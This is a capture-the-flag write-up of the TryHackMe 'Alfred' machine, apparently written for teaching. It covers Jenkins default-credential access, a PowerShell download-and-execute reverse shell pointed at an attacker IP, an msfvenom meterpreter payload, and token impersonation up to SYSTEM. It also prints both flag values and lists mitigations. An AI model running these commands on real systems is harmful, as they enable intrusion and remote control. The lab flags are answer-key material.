Alfred

Alfred - TryHackMe Writeup

Alfred is a Windows-based machine focused on exploiting Jenkins misconfiguration and performing Windows token impersonation for privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Windows
Themes: Jenkins Exploitation, Windows Token Impersonation, Privilege Escalation

---

Objectives

1. Gain initial access via Jenkins default credentials
2. Establish a reverse shell using PowerShell
3. Escalate privileges through Windows token impersonation
4. Capture both user and root flags

---

Reconnaissance

Nmap Scan

Started with a comprehensive Nmap scan:

nmap -Pn -sCV -T5 10.10.96.249

Results:

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings:

• Port 80: Microsoft IIS web server (default page)
• Port 8080: Jetty server hosting Jenkins
• Port 3389: RDP service enabled

Web Enumeration

Port 80 - IIS Server:
Displays the default Microsoft IIS welcome page.

Port 8080 - Jenkins Dashboard:

Credentials Discovery:
The login form shows asterisks indicating 5-character credentials. Default credentials admin:admin successfully grant access to the Jenkins dashboard.

---

Initial Access

Jenkins Command Execution

After logging into Jenkins:

1. Navigate to Project Configuration:
   

2. Prepare Reverse Shell:
   Used Nishang’s Invoke-PowerShellTcp.ps1 script:

   # Nishang reverse shell script
   function Invoke-PowerShellTcp 
   {
       [CmdletBinding(DefaultParameterSetName="reverse")] Param(
           [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
           [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
           [String]
           $IPAddress,
           [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
           [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
           [Int]
           $Port
       )
   }
   

3. Setup Infrastructure:

   # Start Python web server
   python3 -m http.server 4444
      
   # Start Netcat listener
   nc -nlvp 9999
   

4. Execute Reverse Shell via Jenkins:
   Added this command in Jenkins build configuration:

   powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.145.45:4444/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.145.45 -Port 9999
   

   

5. Trigger Build:
   

Shell Access Obtained

Windows PowerShell running as user bruce on ALFRED
PS C:\Program Files (x86)\Jenkins\workspace\project>

User Flag Capture

PS C:\Users\bruce\Desktop> type user.txt
79007a09481963edf2e1321abd9ae2a0

---

Meterpreter Migration

Generating Payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.145.45 LPORT=6060 -f exe -o shell.exe

Transfer and Execution

1. Host payload:

   python3 -m http.server 9999
   

2. Download on target:

   (New-Object System.Net.WebClient).DownloadFile('http://10.11.145.45:9999/shell.exe','shell.exe')
   

3. Setup Metasploit handler:

   msf6 > use exploit/multi/handler
   msf6 > set payload windows/meterpreter/reverse_tcp
   msf6 > set LHOST 10.11.145.45
   msf6 > set LPORT 6060
   msf6 > run
   

4. Execute payload:

   Start-Process shell.exe
   

Meterpreter Session Established

meterpreter > getuid
Server username: ALFRED\bruce

---

Privilege Escalation

Token Impersonation with Incognito

1. Load incognito extension:

   meterpreter > load incognito
   

2. List available tokens:

   meterpreter > list_tokens -g
      
   Delegation Tokens Available
   ========================================
   BUILTIN\Administrators
   BUILTIN\Users
   NT AUTHORITY\Authenticated Users
   ... [truncated for brevity]
   

3. Impersonate Administrator token:

   meterpreter > impersonate_token "BUILTIN\Administrators"
   [+] Successfully impersonated user NT AUTHORITY\SYSTEM
   

4. Verify privilege escalation:

   meterpreter > getuid
   Server username: NT AUTHORITY\SYSTEM
   

Root Flag Capture

meterpreter > cd C:\Users\Administrator\Desktop
meterpreter > type root.txt
dff0f748678f280250f25a45b8046b4a

Alternative Path: The root flag is also located at C:\Windows\system32\config\root.txt

---

Key Takeaways

Attack Path Summary:

Port Scanning → Jenkins Discovery → Default Credentials → 
Command Execution → PowerShell Reverse Shell → Meterpreter Migration → 
Token Impersonation → SYSTEM Access

Vulnerabilities Exploited:

1. Default Jenkins Credentials - admin:admin credentials
2. Jenkins Build Command Execution - Unrestricted command execution in builds
3. Windows Token Misconfiguration - Available Administrator tokens for impersonation

Mitigation Strategies:

1. For Jenkins:
   • Change default credentials immediately
   • Restrict build permissions
   • Implement role-based access control
   • Regular security updates
2. For Windows Token Security:
   • Implement User Account Control (UAC)
   • Restrict token privileges
   • Regular security auditing
   • Principle of least privilege for service accounts
3. General Security:
   • Network segmentation
   • Regular vulnerability assessments
   • Security awareness training

Tools Used:

• Nmap - Port scanning and service enumeration
• Nishang - PowerShell reverse shell script
• Metasploit - Payload generation and handler
• Incognito - Token impersonation extension
• Netcat - Reverse shell listener

---

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

---